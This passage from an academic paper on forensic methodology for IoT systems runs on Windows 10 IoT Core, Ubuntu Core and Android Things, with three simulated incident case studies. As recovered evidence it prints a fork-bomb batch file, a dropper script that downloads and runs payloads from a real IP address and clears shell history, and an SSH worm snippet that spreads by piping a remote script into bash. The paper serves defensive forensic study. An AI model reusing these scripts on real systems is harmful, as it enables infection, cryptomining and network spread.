on the device, a public key from a computer is associated with the Ubuntu account registered on it, meaning that the remote connection via the SSH service can only be established using that key. The steps needed to carry out the acquisition are the following:

- Connect the computer whose public key was associated to the device to the same network that the

IoT device is connected to. If the image is going to be stored on a different computer, it also needs to be connected to that network and be imported the key associated with the Ubuntu account.

- Start listening for connections using “netcat” on the computer that is going to store the image.
- Launch a remote shell on the device, become the superuser (no password needed) and execute the “dd” command, pipelining its exit using “netcat” to the computer IP address and port set in the previous step.
- Wait until the “dd” command has finished and close the connection in the forensic computer.

If the acquisition is performed offline, regardless of the method followed, the investigator can either use a forensic computer to run the programs to collect the data or a hardware imager. The “dd” command is also a good option for this technique, as are other tools such as FTK Imager [48] or Guymager [28]. If the forensic computer is using a Windows operating system, the only tool out of those mentioned that is natively compatible is FTK Imager, while the three of them can be used in a Linux-based system.

5.2.3 Analysis

The approach of the analysis depends on many variables, such as the type of incident that has occurred, the type of devices involved, the aim of the investigation, or the particular laws of the country regarding forensic investigations. Consequently, only general suggestions are provided in this section, as it is impossible to address all the possible scenarios. In particular, guidelines are provided as to whether to opt for a live analysis or an offline one, as it can be seen in Figure 6. With respect to data analysis, since the operating systems in this context are based on other versions that are well known forensically speaking, it is useful to use the procedures designed for them as a reference for what information can be extracted.

Live analysis is the best option in certain situations, but the information that can be obtained from the system is limited by the impossibility of executing many forensic tools, only the ones compatible with the operating system being analyzed and, at the time of designing this proposal, there are not many. Therefore, the investigator must perform the operation by relying on the commands and features existing by default in the system, which, in some incidents where the device has been compromised, can provide inaccurate information. Also, the limited computational power of IoT devices can drag out the analysis. For these reasons, opting for

a live analysis should only be done when the investigator has a thorough knowledge of the system, and is capable of executing the proper commands without hesitating. If that is not the case, it is preferable to perform an offline analysis and only contemplate the possibility of an online inspection if there is no other option; for example, when the investigator does not have physical access to the device, the investigation requires an extremely quick examination, or no legal measures are going to be taken. Furthermore, this approach requires a greater effort in the defence of the admissibility of the evidence in a court of law, as it is necessary to prove that the actions executed had no impact on the original data or the conclusions that were extracted from it.

On the other hand, offline analysis guarantees the integrity of the data, since all the actions performed when the examination is being carried out have no impact on the collected data. In addition, as mentioned above, this method allows the investigator to use external tools, which is very useful for operations such as carving. It also has the advantage of enabling the recreation, to some extent, of the original scenario; the image can be burnt into a device of the same characteristics and the dynamic behaviour of the system can be studied.

Regarding the tools that can be used in this phase, a general list for the offline analysis is provided in Table 3, highlighting their compatibility with the Windows and Linux-based operating systems.

Table 3 Tools that can be used for the offline analysis phase and their operating system compatibility

Tool \ OS	Windows	Linux-based
Browsing Tools		
FTK Imager [48]	✓	✗
Autopsy [26]	✓	✓
Carving Tools		
QPhotorec [49]	✓	✓
Foremost [50]	✗	✓
Other Tools		
Log2Timeline [51]	✓	✓
ExifTool [52]	✗	✓
Registry Explorer [53]	✓	✗
MFTE Explorer [53]	✓	✗
KAPE [54]	✓	✗

```

Ssh terminal of the device
forensic@localhost:~$ sudo su
root@localhost:~# whoami
root
root@localhost:~# mount
svsfs on /sys type svsfs (rw,nosuid,nodev,noexec,relatime)
/dev/mmcblk0p2 on /writable type ext4 (rw,relatime,data=ordered)
/dev/mmcblk0p1 on /boot/uboot type vfat (rw,relatime,fmask=0022,dmask=0022,codepage=
cii,shortname=mixed,errors=remount-ro)
root@localhost:~# mount /dev/sda1 /mnt/usb
root@localhost:~# dd if=/dev/mmcblk0p1 of=/mnt/usb/ubuntu.dd
262144+0 records in
262144+0 records out
134217728 bytes (134 MB, 128 MiB) copied, 3.58076 s, 37.5 MB/s
root@localhost:~# umount /mnt/usb/
root@localhost:~# sha256sum /dev/mmcblk0p1
bf38b90eb3cc11b7e264c9371a0e829f1cfa20446a32dfd6ecd4cfd53d63d77f /dev/mmcblk0p1

Forensic Computer
ubuntu@ubuntu-VirtualBox:~$ cd /media/ubuntu/7280-99F1/
ubuntu@ubuntu-VirtualBox:~/media/ubuntu/7280-99F1$ ls -l ubuntu.dd
-rw-r--r-- 1 ubuntu ubuntu 134217728 ago 25 16:32 ubuntu.dd
ubuntu@ubuntu-VirtualBox:~/media/ubuntu/7280-99F1$ sha256sum ubuntu.dd
bf38b90eb3cc11b7e264c9371a0e829f1cfa20446a32dfd6ecd4cfd53d63d77f ubuntu.dd

```

Figure 5 Live acquisition of the “writable” partition in the Ubuntu Core operating system using an external storage

Figure 6 Flowchart of the proposed analysis phase

5.2.4 Evaluation

This is the last practical phase of the investigation. Once all the relevant devices have been analyzed, and all the evidence has been gathered, the next step is to evaluate it in order to accurately portray what happened in the incident from the perspective of the whole environment. This facilitates the preparation of the report, and might help the investigator to detect new possible sources of evidence.

Normally, this is a process that is included in the analysis phase, but the increase in the number of devices to analyze and, consequently, in the amount of evidence gathered from all of them, complicates the task. Furthermore, if the analysis process takes a prolonged period of time, the investigator can lose track of what information was extracted from other devices, and how all the conclusions fit together.

As it can be seen in Figure 7, the first action that needs to be performed is to select the most significant evidence from each device, which helps to distinguish what the most relevant actions that occurred on it are, and refresh the ideas obtained from them. Secondly,

every piece of evidence is studied to determine what impact it had on the device from which it was extracted, and the significance that it could also have had for the rest of the devices in the network. The interaction between devices must be supported with the interrelation among the pieces of evidence. This operation makes it possible to establish causality among them and complement the hypothesis extracted in the previous phase, thus giving the analysis a degree of completeness. In addition, plausible evidence that did not fit into the conclusions extracted from the analysis of a given device can make sense when studied jointly with the information extracted from another one. Consequently, the viewpoint from which the assumptions were drawn completely changes, now that the environment is treated as an entity and all the conclusions are deduced from this perspective. At the end of this phase, the investigator must be able to chronologically retrace the actions that occurred during the incident, describe how they affected the devices in the network, and say what evidence supports this interpretation based on the information collected.

Figure 7 Flowchart of the proposed evaluation phase

5.2.5 Post-Process

In this phase, the actions that need to be carried out before closing the investigation are performed, and these can be summarized in the following three tasks: writing and presenting the forensic report, returning or destroying the original sources of evidence that were seized (if there were any), and returning the IoT system to a functioning state. Since the first of these two processes are almost identical to those followed in conventional investigations, they are not detailed in this proposal. However, the recovery operation is more complex when working in the IoT environment given the large number of devices that can be present in it, and, in private investigations in which no legal measures have been taken, it is quite common for the requester to ask the investigator to make sure that the IoT system can be used again. The actions recommended are the following:

Evaluate the damage caused by the incident. Although it is a task that is carried out during the analysis and evaluation phases, now the investigator has a higher degree of flexibility and can test the devices without fear of destroying any evidence. Therefore, they can employ any tool that completely checks that all the components of the device are working properly, as well as whether the source of the incident is still present in the environment.

Secure the environment. This is especially relevant when the incident occurred due to malware or because the IoT environment was compromised. The first action that needs to be performed is the elimination of the element that caused it. If malware was the cause, it may suffice with simply stopping the malicious process, if it did not gain persistence, or, in the case of an exploit-

ation, with updating the system and its services. After executing any action, a scan is required to make sure that the problem has been solved, and that there are not any others. If it did not succeed, the system might need to be restored.

Restore or recover the systems. The recovery option is the fastest and simplest method to get the system running again, but it requires a working backup copy for the device to be brought back to a previous state. For this reason, it is extremely useful to program the creation of backup copies periodically, even more so taking into account that they do not take up a large amount of storage. If there are no backups, a restore might be in order. This means reinstalling the corresponding firmware or operating system, which causes the loss of all the existing data, and then installing the applications and services needed to function again. Although these operations can be performed with external tools, the operating systems modelled offer the following options:

Windows 10 IoT Core. There is no native way to create a whole backup of the system, the closest option is to customize an image base file that contains the features that the device will require to function, and use it as a restore point. It can be combined with creating a provisioning package, which contains the common and specific settings of the operating system [55]. In order to perform the recovery, Windows provides a Windows Preinstallation Environment (WinPE), which can be used to create a bootable unit that can be used to flash the device. Other options are using the recovery partition of the system or downloading it from the cloud, but its version may not be as recent as the one that the system was using [56]. To reset the device, either

the Configuration Service Provider (CSP) or the Azure cloud [57] can be used to trigger the process [58].

Ubuntu Core. Similarly to Windows 10 IoT Core, the closest element to a backup is the creation of a custom image [59]. However, if enabled, the system does automatically create snapshots of the applications installed, saving the user, system and configuration data, which can then be restored. By default, a snapshot is generated when an application is removed, and it is retained on the system for a period of 31 days [60]. However, at the time of designing this proposal, no specific tools exist for performing the system recovery or reset, so it must be carried out manually.

Android Things. This also offers the possibility of creating a custom build with the desired Android Things version, as well as the applications that are going to be used on the system [61]. This build can be used to recover the system, a process that can be carried out with the ADB tool in a similar way to the installation process, but by selecting custom build as source. The reset can be performed with the same tool by executing an already included flash script [62].

Confirm that the measures taken have been successful. Once the IoT system is running again, the investigator must make sure that it is behaving properly. To do so, actions such as monitoring the network and rescanning it are recommended, and, in some cases, the requester might even wish to submit the IoT environment to a penetration test to confirm that it is secure enough to be used again.

5.3 Adaptation to Other Contexts

As mentioned above, there are some aspects of this proposal that can be extrapolated to other IoT contexts. In particular, the following details of the proposed phases can be taken into account when designing new methodologies or performing forensic investigations:

- Identification: although this phase is shaped upon the existence of a central node, this approach can be reused in contexts in which there is a device or multiple ones which are more relevant than the others in the scene. Similarly, it can be of use in situations in which the examination of a system is more pressing than others. In these cases, these devices would portray the same role as the central node does in this proposal.
- Acquisition: the offline techniques listed are independent of the operating systems present in the context, the limitation is subjected to the type of storage of the devices that are used in it. Therefore, and

as this proposal covers all the common offline procedures, it can be reused in multiple IoT scenarios. In the case of the online acquisition, it is the operating system which determines whether it can be carried out or not, so a study of the corresponding one would be necessary to determine if it could be a viable option. In addition, the proposal can be adapted if a different approach regarding the forensic soundness of the acquisition wants to be followed, only a reordering of the collection methods would be needed.

- Analysis: the decision making on whether to perform an offline or online analysis can be of use in other IoT contexts, since it has been modelled regarding the forensic soundness of an investigation. The same occurs with some of the forensic tools listed, since they are general ones, not system centered. In this proposal, strictly focusing on the quality of the information collected, it is preferable to carry out an offline analysis, but that could be different in other scenarios, so a study would be in order to determine what data can be extracted in a live analysis of the systems involved.
- Evaluation and Post-Process: they are independent of the context, the recommendations provided on how to handle the conclusions extracted from the analysis phase can be of use in any forensic investigation, as well as, the guidelines presented on how to bring back the IoT system to a functioning state.

6 Practical Evaluation of the Proposed Methodology

To evaluate the practicality of the proposal, different tests were carried out, simulating three security incidents that could present in real life and require the opening of a forensic investigation. In all the case studies presented, the four main phases described in the methodology, namely “Identification”, “Acquisition”, “Analysis” and “Evaluation”, were implemented using the tools recommended. The objective was to be able to demonstrate what happened during each incident with clear evidence and, as a result, confirm the usefulness of the proposal.

6.1 General Test Environment

Although every case has its own particular characteristics, all of them share the same general structure, which follows the topology described in Section 5.1.2 and is made up of the following equipment:

- Raspberry Pi: acts as the central node of the IoT network. It is the device that varies the most between the different scenarios and provides meaning to the investigation. The version employed for the evaluation is Model 3 B [63], and a 32 Gb microSD card is used to provide the functionality of the non-volatile memory.
- Arduino board: receives and sends information via Bluetooth or WiFi to the central node. Since they are not executing any actual task, the same board acts as a sensor and an actuator. The specific device used is an Intel Galileo Gen 1 [64].
- WiFi access point: provides connectivity between the IoT network and the devices inside and outside it. It has the Openwrt [39] firmware installed.
- Forensic computer: device which has all the forensic tools installed in order to carry out the identification, acquisition, analysis and evaluation phases. It has access to the WiFi network in order to perform the live acquisition or analysis, if necessary. Natively, it uses the Windows 10 operating system, but can virtualize others such as CAINE [65] or Ubuntu [66].
- Control device: computer used to set up the environment and interact directly with the central node via the different services provided by the latter. In some cases in which the distinction between the control device and the forensic computer is not necessary, the same device will provide both functionalities. Its operating system is Ubuntu 18.04 LTS.

In Figure 8, the graphical representation of the environment is shown.

6.2 Case 1: Denial of Service (DoS) Attack in Windows 10 IoT Core

A forensic investigation is requested in an IoT network that is used to measure the temperature of a room and send the data to a central node, which runs an application that stores the data in a .csv file and shows it graphically via a web browser in order to extract information regarding temperature and electric consumption data. The client states that the system stopped working the day before, and they have no clue as to what caused it, but they suspect that an internal attack is the cause, as only the members of the company know about the IoT system. For this reason, the person making the request specifies that the investigation is only for internal purposes and no legal measures will be taken.

The environment in which the investigation took place had the topology described in Section 6.1. Re-

garding the particular characteristics of the devices, the Raspberry Pi had the Windows 10 IoT Core operating system installed and was connected via Bluetooth to the Intel Galileo that had a temperature sensor fitted to it. The control device was a Windows 10 desktop computer that was connected to the WiFi network in order to be able to interact with the central node, and the forensic computer was a laptop with Windows 10 installed with a CAINE virtual machine.

6.2.1 Identification

When the scene was examined, the central node was still powered on, but, due to the DoS attack, it did not respond to any command, so the only way to check whether there were any devices connected to it was to perform its acquisition and check the registry for information. During the case description, the investigator was mentioned that an Intel Galileo board was connected to the central node and, after checking the registry, it could be seen that, indeed, the Raspberry Pi was connected to another device via Bluetooth.

The Arduino Board was supposed to act as a temperature sensor, sending data to the central node every half an hour. As the person requesting the investigation did not want to take legal measures, there was no need to preserve the evidence, so a live analysis was performed, instead of acquiring the non-volatile memory.

The last device to study was the control device, which was a Windows 10 desktop computer that was connected to the same WiFi network as the Raspberry Pi. It was, in theory, the only device that had access to that WiFi network and was not part of the IoT one. Its purpose was to control the central node and obtain information via the web server and the Windows 10 IoT Core Dashboard application, which allows you to connect via SSH remotely. The same premise used for the Intel Galileo was applied to the computer, namely that as the case did not require legal measures, a live analysis was performed in order to save time.

6.2.2 Acquisition

The only device that needed to be acquired was the Raspberry Pi. As the investigator had physical access to the device and there was no way to execute commands in the system, an offline method was used. The non-volatile memory was not soldered to the board, it being in the form of a microSD card, so the device was shut down and the microSD was extracted and placed in a microSD to SD adapter which included a write blocker.

The adapter was inserted into an SD Card reader and plugged into the forensic computer, and FTK Im-

Figure 8 General test environment used for the evaluation of the methodology

ager was launched to create the image file. When the process ended, a 32 GB dd file was obtained.

6.2.3 Analysis

The actions performed were the following:

Sensor. The live analysis of the Intel Galileo revealed that the attack did not affect the device, since it was still working properly during the examination, sending correct data about the temperature, and the logs showed that there was no interruption in the service. Additionally, there were no signs that indicated that the attack originated from it. Therefore, after its analysis, the Intel Galileo seemed to have no importance in the attack, pointing to the idea of a dedicated attack on the central node.

Central Node. The study of the SSH logged connections, stored in the OpenSSH event file, confirmed that the desktop computer studied performed multiple logins on the reported date of the attack, as can be seen in Figure 9, and that it was the only device that had ever logged on the Raspberry. In view of this, the “Administrator” user directory, which is the one used during the SSH connection, was examined, and a .batch file was found whose content is shown in Figure 10. As can be appreciated from its content, it is a very simple script that creates an infinite number of command prompts, which can cause the system to crash, especially in these low computational capacity devices. Examining the file attributes of the script, it can be observed that the “Change”, “Access” and “Creation”

times are four minutes after the start of the last SSH connection. In order to confirm that the .batch script was the cause of the DoS, an identical instance of the central node was powered on, the file was executed, and the Raspberry Pi stopped working after a few seconds, making it impossible to bring back the system to a functional state without shutting it down.

Control Device. The analysis of the computer did not offer any clues initially, so a carving process was executed in order to determine whether there was any relevant evidence in the deleted files. Using the QPhotorec tool, the files deleted were extracted and a .batch script was recovered. The file contained the same data as that detected on the Raspberry Pi, so a hash comparison was made, determining that they were in fact identical. In addition, the IP address of the computer was checked, and it was confirmed to be the same that the one which connected to the central node. Both pieces of evidence are shown in Figure 11.

6.2.4 Evaluation

The most relevant piece of evidence found was the script file stored in the non-volatile memory of the Raspberry Pi, which determined the cause of the stoppage of the service, as it was proven to work when launched in an instance of Windows 10 IoT Core. After its analysis, it was confirmed that it did not have impact on any other device in the network. The second piece of evidence found on the central node was the logged SSH connections, which meant that there was interaction

Figure 9 System event created for the successful login of the control device via SSH

@echo off
:crash
start
goto crash

Figure 10 Batch file found on the central node

Name	/img_Case Study 1 Windows IoT.001/vol_vol9/Users/administrator/crash.bat
Type	File System
MIME Type	application/x-bat
Size	34
File Name Allocation	Allocated
Metadata Allocation	Allocated
Modified	2018-11-15 13:11:09 CET
Accessed	2019-09-01 22:55:35 CEST
Created	2019-09-01 22:55:27 CEST
Changed	2019-09-01 22:55:27 CEST
MD5	461a0db157db5926b395e1c835a97c82

```
< C:\Carved\recup_dir.1\f0002565.bat >
MD5: 461A0DB157DB5926B395E1C835A97C82
SHA-1: 14DC8C237734881F896607896C2ED363A186192D

< D:\Autopsy Cases\Case Study 1\Export\crash.bat >
MD5: 461A0DB157DB5926B395E1C835A97C82
SHA-1: 14DC8C237734881F896607896C2ED363A186192D
```

Hash comparison of the .bat files found on the central node and the control device

IP address of the control device

Figure 11 Pieces of evidence found on the control device

with another device. This second device was confirmed to be the computer acting as the control device, which

had the same IP address as the logged in the OpenSSH event file.

Regarding the information found on the control device, another .bat file was recovered from its storage, which was compared with the one present on the Raspberry Pi, and was confirmed to be identical, since their hash codes matched. This, added to the information regarding the IP address of the computer and the logged SSH connections of the Raspberry Pi, allowed to link both devices with clear evidence, and determine that there was an exchange of data between them.

As no other evidence was extracted from any of the devices, there was no other information to link, taking into account that the Intel Galileo had no impact on the attack and was not affected by it. Therefore, the reconstruction of events from the perspective of the whole network can be carried out using these conclusions, demonstrating that the actions that occurred in the incident were the following:

At 22:51 the control device connected to the central node via SSH, as it showed in the OpenSSH event file of the latter. According to the “Change”, “Access” and “Creation” attributes, four minutes later, the “crash.bat” file was copied from the computer to the user directory of the “Administrator” account in the Raspberry Pi . Then, it was launched, causing it to stop working. After that, in order to remove possible evidence, the user deleted the original script from the computer, which was ultimately recovered from the filesystem.

6.3 Case 2: Malware Infection in Ubuntu Core

An external attack on the network of a company resulted in several devices being infected with malware. An IoT network was deployed at the time of the attack, although no abnormal activity was detected on it, so a forensic investigation was needed in order to determine whether the incident had any impact on it.

The IoT system was being used for smart home purposes, detecting presence in a room and informing about it. It consisted of a Raspberry Pi acting as a central node, with Ubuntu Core installed, and an Intel Galileo board with a motion sensor connected to it. The former provided functionality to the network, acting as a broker of a MQTT server, and the latter published data regarding the state of the motion sensor. These two devices were connected via a WiFi network, which was also accessed by a desktop computer to interact with the central node using SSH in order to manage the devices. The forensic computer used for the investigation was a laptop computer with Windows 10.

6.3.1 Identification

Due to the fact that malware was detected on the network, all the devices present in it were shut down when the scene was examined. Consequently, an offline acquisition was performed on the central node, and the image file was analyzed in order to determine whether there were any devices connected to it. The logs from the MQTT service were inspected and it was confirmed that the Intel Galileo was connected to the Raspberry Pi. Regarding the desktop computer, as it had previously interacted with the central node, and there were external SSH keys stored on the latter, it also had to be considered as a possible source of evidence.

Since both the Intel Galileo board and the desktop computer had an acquirable memory, they were already shutdown, and as there was no rush to carry out the analysis, an offline acquisition was performed. In addition, since there was a possibility of malware being present on the devices, an offline approach was considered the best option to obtain accurate information, taking into account that a malicious software can hide information when it has infected a system.

6.3.2 Acquisition

The same approach was followed for the three different devices, as their circumstances were similar: the investigator had physical access to them and their non-volatile memory was removable. Therefore, an offline acquisition was performed on all of them. In the case of the Raspberry Pi and the Intel Galileo, their microSD cards were extracted and placed into a microSD to SD adapter which included a write blocker. Then, the adapter was inserted into the forensic computer and the FTK Imager tool was used to create the image files. Regarding the desktop computer, its hard drive was extracted and placed into a write blocker enclosure, which was connected to the forensic computer, and an image file was created using the same software as for the microSD cards.

As a result, three image files were created: one of 32 Gb for the microSD card of the Raspberry Pi, one of 4 Gb for the Intel Galileo, and another of 120 Gb for the desktop computer.

6.3.3 Analysis

The offline examination process of each device was carried out as described below:

Sensor. After studying the image file acquired, including a carving process to recover the deleted files, no evidence related to the incident was found. The MQTT

logs, which were programmed to store the topic messages in the system, showed that the service was working properly until the device was shutdown, and no abnormal data was either sent or received by the Intel Galileo, as can be seen in Figure 12. Consequently, it could be concluded that the attack did not directly affect this device, other than the fact that it stopped providing a service when the client shut it down.

Central Node. The analysis revealed the presence of a malware file in the user directory, which is shown in Figure 13. This sample was recognized by multiple anti-virus services as the Dofloo trojan [67], which execution was confirmed when the bash history was checked. Its “Change”, “Access” and “Creation” attributes showed that the malware file was stored on the system on 09/09/2019 at 17:48. In addition, the bash history also showed the creation of a .service file to gain persistence and execute the malware every time the device started, which presence was confirmed when the corresponding directory was examined, as illustrated in Figure 14. When studying the logs of the SSH service, it was noticed that the last time that the “authorized_keys” file, the one that contains the information of the public key which is allowed to log on the system, was accessed was five minutes before the malware file was created in storage. Regarding the MQTT service, no irregularities were found in the logs, confirming that the attack did not affect the service that the IoT network was providing.

Control Device. The analysis of the registry files from the computer revealed that there was a SSH key pair stored on it. In order to compare with to the one on the Raspberry Pi, the key value was extracted from the registry, and then imported into a new instance of a Windows 10 system with the same SSH client installed. After that, the public key was extracted and compared with the value of the one stored on the central node, which was the only one that authorized a device to log into it. As it is shown in Figure 15, both public keys matched (it can also be noticed the data regarding the date attributes of the “authorized_keys” file mentioned before).

6.3.4 Evaluation

The evidence that is the most representative of what happened in the incident is the malware sample found in the user directory on the Raspberry Pi. The examination of the bash history confirmed its execution, as well as the creation of a service to gain persistence on the device and launch the malware every time the system started. These three linked evidences only targeted the central node, so it did not have any impact on other

devices. Regarding the connections made by the device, it was detected that the “authorized_keys” file was accessed five minutes before the creation of the malware, and that it contained a public SSH key that could be linked with other device, what meant that a connection was made.

With this in mind, the control device was analyzed, and the examination of the Windows registry revealed an entry for an SSH key, which was confirmed to be the same as the one stored on the central node, therefore linking both pieces of evidence and proving that the control device was the only one that could log on the Raspberry Pi.

The lack of findings on the Intel Galileo, the other device present in the IoT network, proved that the incident had no impact on it. With all the evidence pieced together, the reconstruction of the incident could be performed, and its contents are detailed below.

After the company network was compromised, the attacker had access to the devices that were on it. That did not affect the IoT network directly, unlike the control device, which the cybercriminal had access to. Taking advantage of the fact that it contained the SSH public key associated with the Raspberry Pi, and that was the only device that could connect to the central node using that service, the attacker logged in to download and execute a malware program identified as a Trojan named Dofloo on 09/09/2019 at 17:48, as it showed in the attributes of the malicious file, and in the “authorized_keys” file of the SSH service. According to the bash history, after its execution, a service was deployed to obtain persistence and be able to launch the malware automatically every time the system started, which was found in the corresponding directory. Despite the infection, there was no evidence of an abnormal functioning of the smart home service, and the rest of the devices were not affected by the malware, so the incident had no impact on the information handled by the IoT network, since the sensor was still sending the data correctly, and the logs of the central node showed no irregularities.

6.4 Case 3: Internal Attack in Android Things

A home owner stated that the devices in his IoT network were behaving erratically, not responding to any commands, and when they did there was a very noticeable lag, which had never happened before. In addition, the whole local network was operating inadequately, also affecting the laptop computer that was normally used by the client. Therefore, a forensic investigation was requested after the suspicion that the IoT network could be infected with malware.

```

2019-09-09 23:50:37,588 INFO --- MqttFX ClientModel : attempt to add PublishTopic
2019-09-09 23:50:37,588 INFO --- MqttFX ClientModel : successfully published message 1 to topic house/room1/presence_detector (QoS 0, Retained: false)
2019-09-09 23:50:37,995 INFO --- PublishController : publish
2019-09-09 23:50:37,996 INFO --- MqttFX ClientModel : attempt to add PublishTopic
2019-09-09 23:50:37,996 INFO --- MqttFX ClientModel : successfully published message 1 to topic house/room1/presence_detector (QoS 0, Retained: false)
2019-09-09 23:50:38,299 INFO --- PublishController : publish
2019-09-09 23:50:38,300 INFO --- MqttFX ClientModel : attempt to add PublishTopic
2019-09-09 23:50:38,300 INFO --- MqttFX ClientModel : successfully published message 1 to topic house/room1/presence_detector (QoS 0, Retained: false)
2019-09-09 23:50:38,603 INFO --- PublishController : publish
2019-09-09 23:50:38,604 INFO --- MqttFX ClientModel : attempt to add PublishTopic
2019-09-09 23:50:38,604 INFO --- MqttFX ClientModel : successfully published message 1 to topic house/room1/presence_detector (QoS 0, Retained: false)
2019-09-09 23:50:38,851 INFO --- PublishController : publish
2019-09-09 23:50:38,852 INFO --- MqttFX ClientModel : attempt to add PublishTopic
2019-09-09 23:50:38,852 INFO --- MqttFX ClientModel : successfully published message 1 to topic house/room1/presence_detector (QoS 0, Retained: false)
2019-09-09 23:50:39,027 INFO --- PublishController : publish
2019-09-09 23:50:39,028 INFO --- MqttFX ClientModel : attempt to add PublishTopic
2019-09-09 23:50:39,028 INFO --- MqttFX ClientModel : successfully published message 1 to topic house/room1/presence_detector (QoS 0, Retained: false)

```

Figure 12 Log of the MQTT presence sensor

Figure 13 Malware file detected in the Ubuntu Core system

Figure 14 Evidence found regarding the creation of a service to gain persistence

The IoT system studied consisted of two Android Things systems, both of them being Raspberry Pi boards. One of them, which was placed in the living room, was used as an assistant, executing Google Home and having a microphone and two speakers installed. The other one acted as a remote doorbell and was installed by the door of the house, allowing the owner to see who was on the front lawn at any moment and be remotely notified when the bell was rung. Both of them were connected to the local WiFi network, which was shared with the laptop computer, which acted as a con-

trol device. To carry out the investigation, a Windows 10 laptop was used as a forensic computer.

6.4.1 Identification

In this scenario, the investigator faced the particularity that there were, a priori, two equally relevant single boards in the topology and, although the procedure to follow does not change, they had to choose one to study first. Considering the client’s description of the context, the “Home Assistant” was deemed the most significant one, since it provided more services, so it was the one that was evaluated first. As it was on, the Bluetooth

Figure 15 Image of the extracted SSH key from the computer and its match with the one stored on the Raspberry Pi

and WiFi connections were checked using the user interface included in the operating system. There were no Bluetooth devices connected and, regarding WiFi, the Raspberry Pi was connected to the local network, as it is illustrated in Figure 16. Then, the device was shut down to collect its memory, since malware could be involved. The same procedure was followed with the “Remote Doorbell” and identical results were obtained with respect to the connections.

The last device present at the scene was the laptop computer, which was off at the moment of the identification. Although, no connections with it were found on the boards, the client stated that it had ADB installed and was regularly used to control the devices and install the applications, so it had to be considered as a possible source of evidence. As its non-volatile memory was acquirable, it remained off to proceed with the acquisition.

6.4.2 Acquisition

Both of the Raspberry Pi boards were physically accessible and had their non-volatile memory in the form of microSD cards. Therefore, and as the device was shut down during the investigation phase, an offline acquisition was performed. Their microSD cards were extracted and placed into a microSD to SD adapter with write blockage capabilities. After that, the adapter was inserted into the forensic computer, and two 32 Gb image files were obtained using FTK Imager.

In the case of the control device, its hard disk was not easy to access, so the investigator chose to boot

the computer with an external USB disk containing the CAINE operating system and acquire its image on an external storage using Guymager.

6.4.3 Analysis

The information retrieved from the examination of the devices was the following:

Home Assistant. No data that could explain an abnormal functioning of the application was found in the files available in the storage, or in the carved ones. Therefore, it could not be proven that the incident affected this device, even though the client stated that it was not behaving properly.

Remote Doorbell. During the carving process, a shell script was recovered. As can be seen in Figure 17³, where its content is shown, the program determines which type of device it is on, downloads a file using “wget” or “curl”, executes it and deletes all the files. By analyzing its traces, it was identified as malware, specifically a botnet miner, which also tries to connect to the known SSH hosts to infect them as well and spread through the network, as shown in Figure 18. In this case, there were not any known host, since the connections with the control device were made through ADB, and the interaction with the “Home Assistant” was made through an Android application. In addition, in order to connect to an Android Things system

³ The IP addresses shown in the image that were used to download the bash files were no longer operative when the case study was carried out, so in order to execute them, the addresses were replaced by local ones.

Figure 16 Picture taken of the “Home Assistant” during the identification phase, noticing only a WiFi connection, although Bluetooth was activated

through SSH, a port forwarding is needed, which was not configured on either of the boards.

Control Device. After analyzing the image file and recovering the deleted files in the filesystem, no abnormal data was found. On examining the last accessed timestamp for the “adb.exe” executable, it was confirmed, based on its attributes, that this device was used to interact with both of the Raspberry Pi boards, but the last time that the file was executed was 12 days before the incident, as shown in Figure 19, and no other alternative ADB executable was present. Consequently, the control device was not involved in the incident, and the attempt of the malware to spread through the network was unsuccessful, since it never was connected to the “Remote Doorbell” via SSH.

6.4.4 Evaluation

The evidence that was most significant in this case was the two shell scripts recovered from the “Remote Doorbell” storage. They provided information regarding the date of the incident, the cause, and the range. After examining their content, it was determined that their functionality was to download and execute a malware sample, specifically a botnet miner, and to expand through the network using the previous SSH connections of the device. In addition, it was concluded that its impact was only local, so it could not be linked with any other device or evidence.

Regarding the examination of the control device, it allowed the investigator to prove that the incident was an external attack, since the last time that the ADB was executed was 12 days before it happened. The same

could be said for the “Home Assistant”, the lack of abnormal data excluded the device from being involved in the attack. Therefore, the incident was reconstructed by just using that evidence, as can be seen below.

Based on the carved scripts from the “Remote Doorbell” storage, on 02/09/2019, the Raspberry Pi that was providing the mentioned service was remotely attacked. Since the port on which the ADB server usually runs was open and without password protection, the attack was successful, allowing it to log into the system and launch a botnet miner that unsuccessfully tried to spread through the network. The malware, although it did not modify any files related to the application that the board was running, consumed most of the system resources of the “Remote Doorbell”, making it impossible to work properly, but no evidence was detected that it affected other devices in the network, since it used the known host of the SSH service to spread, but there were not any.

7 Conclusions

In this proposal, we have addressed standardization in digital forensics, focusing on the new scenario introduced by the IoT, given the huge increase in the number of cyberincidents occurring in this environment. After comparing the novel characteristics of IoT devices and systems, and how they affect a forensic investigation, it has been seen that the methodologies designed for conventional forensic examinations cannot satisfy their requirements. The differences between them are far too significant and affect fundamental concepts, such as the

```
#!/bin/sh

X86="http://198.98.51.104:282/x86/bash"
ARM="http://198.98.51.104:282/arm/bash"
AARCH64="http://198.98.51.104:282/aarch64/bash"

CPU_TYPE=$(uname -m)

if [ "$CPU_TYPE" = "x86_64" -o "$CPU_TYPE" = "i386" -o "$CPU_TYPE" = "i686" ]; then
wget -q $X86 2>/dev/null || curl -fsSLO $X86 2>/dev/null
if [ -s bash ]; then
chmod +x bash 2>/dev/null
./bash
rm -rf bash*
fi
fi

if [ "$CPU_TYPE" = "armv7l" ]; then
wget -q $ARM 2>/dev/null || curl -fsSLO $ARM 2>/dev/null
if [ -s bash ]; then
chmod +x bash 2>/dev/null
./bash
rm -rf bash*
fi
fi

if [ "$CPU_TYPE" = "aarch64" ]; then
wget -q $AARCH64 2>/dev/null || curl -fsSLO $AARCH64 2>/dev/null
if [ -s bash ]; then
chmod +x bash 2>/dev/null
./bash
rm -rf bash*
fi
fi

/sbin/sysctl -w vm.nr_hugepages=128
cd /tmp ; wget http://198.98.51.104:282/1 || curl -O http://198.98.51.104:282/1 ; chmod 777 1 ; sh 1 ; rm -rf 1* ;clear;history -c; clear;history -w
cd /tmp ; wget http://198.98.51.104:282/2 || curl -O http://198.98.51.104:282/2 ; chmod 777 2 ; sh 2 ; rm -rf 2* ;clear;history -c; clear;history -w
rm -rf i.sh*
```

Figure 17 Malware sample found on the “Remote Doorbell” board

```
if [ -f /home/./.ssh/known_hosts ] && [ -f /home/./.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /home/./.ssh/known_hosts);
do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://198.98.51.104:282/i.sh | bash >/dev/null 2>&1 &' & done
fi
```

Figure 18 Code of the malware for network expansion using SSH trusted hosts

Name	Size	Type
